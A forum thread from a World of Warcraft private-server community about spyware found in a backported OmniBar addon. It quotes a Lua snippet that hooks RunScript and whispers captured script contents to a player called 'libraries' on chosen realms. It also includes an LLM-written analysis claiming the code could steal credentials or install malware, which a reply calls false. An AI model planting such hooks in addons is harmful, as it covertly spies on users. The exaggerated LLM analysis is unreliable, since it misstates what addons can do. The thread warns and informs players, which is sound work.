Addons and Malware - Risky business?

[krushnb4]

Hey fellow Warmaners,

I've been looking into finding some niche addons recently, and ran into a thread where a guy (or gal) warns that the addon linked by someone in that thread contained malicious code:
https://forum.warmane.com/showthread.php?t=347195

TLDR: the OP of that thread finds the piece of malicious code in the addon, not just some antivirus warning, and decides to post about the issue by providing the code snippet from one of the addon's main files:

Code:

hooksecurefunc("RunScript", function(afga)
    if not realmName then
        local b = "Blackrock"
        local d = "Icecrown"
        realmName = _G.GetRealmName()
        
        if realmName == d or realmName:sub(1, #b) == b then 
            SendAddonMessage( "libraries", afga, "WHISPER", "libraries" ) 
        end
    end
end)

I'm not a cybersecurity expert, but I have been wondering to what extent this sort of malicious code (this or perhaps more advanced ones) infiltrated in apparently harmless WoW addons, could jeopardize the safety of a user and system.

I've been inquiring most popular LLMs (Claude Sonnet, GPT4o, Gemini 1.5 Pro) about this code snippet, while trying to provide the most unbiased prompt I could come up with. Below the prompt, followed by a summarized analysis of the bug based on all 3 models' responses. For summarization Gemini 1.5 Pro was used, and I ensured that all perspectives (from each model) were included in the final output.

Prompt:
"Analyze this code snippet found in one of the main files of a WoW addon. Explain what it does, and if you believe this has the potential to be a malicious piece of code, such as malware, detail what sort of threat there could be to a system and the user who uses it. Here is the code snippet from this addon:
[code provided here]"

Summarized output of Sonnet, GPT & Gemini:

What it does:

hooksecurefunc("RunScript", function(afga): This line hooks into the RunScript function within World of Warcraft. This function is responsible for executing code within the game, including code from addons. By hooking this function, the malicious code can intercept and potentially manipulate any code that's run within the game.
- if not realmName then ... end: This ensures the code only runs once when the addon is loaded.
- local b = "XXXXXXX" and local d = "YYYYYYY": These lines define two variables, b and d, with their values replaced by "XXXXXXX" and "YYYYYYY" respectively. These are likely placeholders for specific realm names or patterns.
- realmName = _G.GetRealmName(): This retrieves the name of the realm the player is currently on.
- if realmName == d or realmName:sub(1, #b) == b then ... end: This checks if the player's current realm matches the specific realm name in d or if the beginning of the realm name matches the pattern in b.
- SendAddonMessage( "libraries", afga, "WHISPER", "libraries" ): If the realm name matches the condition, this line sends a whisper message containing the intercepted code (afga) to a recipient with the same name as the addon ("libraries"). This is the most suspicious part of the code.

Potential Harm:
Code Execution: By intercepting code run within the game, this malware could potentially execute arbitrary code on the user's machine. This could lead to a variety of malicious actions, such as:
- Stealing sensitive information: Account credentials, personal data, etc.
- Installing further malware: Downloading and executing additional malicious payloads.
- Taking control of the user's game account: Performing actions like transferring gold, deleting characters, or spamming chat.
- Compromising the user's system: Exploiting vulnerabilities to gain access to the user's operating system.

Red flags:
In World of Warcraft addon development, the custom "WHISPER" channel "libraries" is not a standard Blizzard communication channel. This suggests it's a custom communication mechanism, likely designed for covert data transmission between the addon and an external recipient.
The code specifically uses SendAddonMessage() to transmit the script's content to this "libraries" channel, indicating a deliberate attempt to send information outside typical game communication pathways. This non-standard channel raises significant red flags for potential malicious intent, such as:

- Exfiltrating player data
- Establishing backdoor communication
- Potential remote command execution
- Targeted information gathering

The code's realm name filtering also suggests this is a precisely targeted communication method, not a random or broad-spectrum data collection approach.

In World of Warcraft, the SendAddonMessage() could potentially transmit:

1) Account-specific data:
- Realm name
- Character names
- Character level
- Account age
- Server location


2) Sensitive gameplay data:
- Guild membership details
- Achievement history
- Character equipment/inventory stats
- Current player location
- Player's active addons
- Authentication tokens


System information:
- IP address
- Client system specifications
- Game installation details
- Installed addon list

The code's targeted realm name filtering suggests this is a precision-targeted information gathering mechanism, likely designed to collect specific user profiles or credentials from particular game servers or player groups.

Conclusion:
This snippet is highly suspicious and likely malicious. You should:
- Avoid installing or running any addon containing this code.
- Report the addon if it was distributed publicly.
- Inspect other addons and scripts for similar suspicious behavior.

----------------------------------


In light of the above, I would appreciate if someone out there with more knowledge on the matter could provide some feedback or share some insights with regards to the veracity and accuracy of this LLM-driven analysis of the code snippet, and also maybe outline what other (perhaps bigger) risks, could be out there with other addons containing similar or more malicious types of code.

Specifically, I'm wondering:
1) What's the worst-case scenario? What could an attacker really achieve with this kind of code?
2) How far can this reach? Could malicious code running inside WoW actually compromise my entire computer? If so, what's the potential damage?
Any insights would be incredibly helpful, not just for me but for everyone in the Warmane (WoW) community!

If you guys have questions, perhaps at some point in the future someone will have some answers. The original post was from December 2023, and I have found it close to a year later, which prompted me to start this thread to discuss the bigger threat we expose ourselves to when downloading and installing seemingly innocuous addons (or entire interface packages) from various websites, youtube video description links, or someone's google drive.

Thanks.

[Shred]

All that code does is that whenever one of your addons or macros calls the RunScript function, it sends the parameters to the player called "Libraries". This only happens if you are in Icecrown or Blackrock.

I think the intention of that code was to catch PQR hackers.

As usual, chatgpt is full of bull****: addons can't steal account credentials or install malware. They also can't delete characters. They can steal gold or make you send chat messages that you don't want to send, they can delete your items or send mail.

[renewqt]

https://github.com/XyzKangUI/AntiJam...readme-ov-file

quote from link above: ''After discovering that Jammin has incorporated spyware into 3.3.5 addons (Ascension-Addons/OmniBar#1), I've created a lightweight script to detect any tampering with specific functions. It's important to note that I cannot assure its reliability post release.

To test: /run hooksecurefunc("RunScript", function() print("123") end)''

XyzKangUI commented on Dec 5, 2023 •

''It seems as if the addon is secretly whispering every RunScript to "libraries". This is to be considered spyware. Given that "Jammin" has backported the addon, it's reasonable to assert that this individual has surreptitiously inserted this code.''

The reply from Ascencion:

''andrew6180 commented on Dec 5, 2023
This has no effect on Ascension other than the very minor impact hooking runscript has since we don't have a blackrock or icecrown realm.

If this backport is still used on warmane it would be good to report your findings there.''

Anyways, i've warned people about this for a long time, warmane players doesn't really care so far, tough.


Every Omnibar for 3.3.5 that is not by Tsoukie has the hooksecurefunc runscript in the file.

The theory is he did it to see what macro's others were running so that he could either copy it or detect cheaters
If you use a ''certain things'' in wow it allows you to run protected functions. One of those protected functions is Ca************ for example.
Meaning you could do some things as people used to have in old vanilla version of wow.

Macro's is what you can get from it, so it could be anything ranging from normal stuff to ToS breaking.
Its an unfiltered implementation, hence what makes it more ill.


Obv you can use it to catch cheaters, expose them and prolly enforce a ban
Or you could extort someone having such information over them.
It depends what the intent is with having such information, But regardless of the intent its very bad practise.
You simply have no right to spy on someone unnoticed.

Also, its the task of the server admins to catch cheaters if that now is would be the purpose, throughout possibly such methods. But obv you would need to make others aware of the fact that their chat and whatever is actively monitored for anti cheat purposes.
This guy just throws it in random addons that are used by alot of people even that play on wow circle and whatever other 3.3.5 server exists.


Of course, this is just a theory.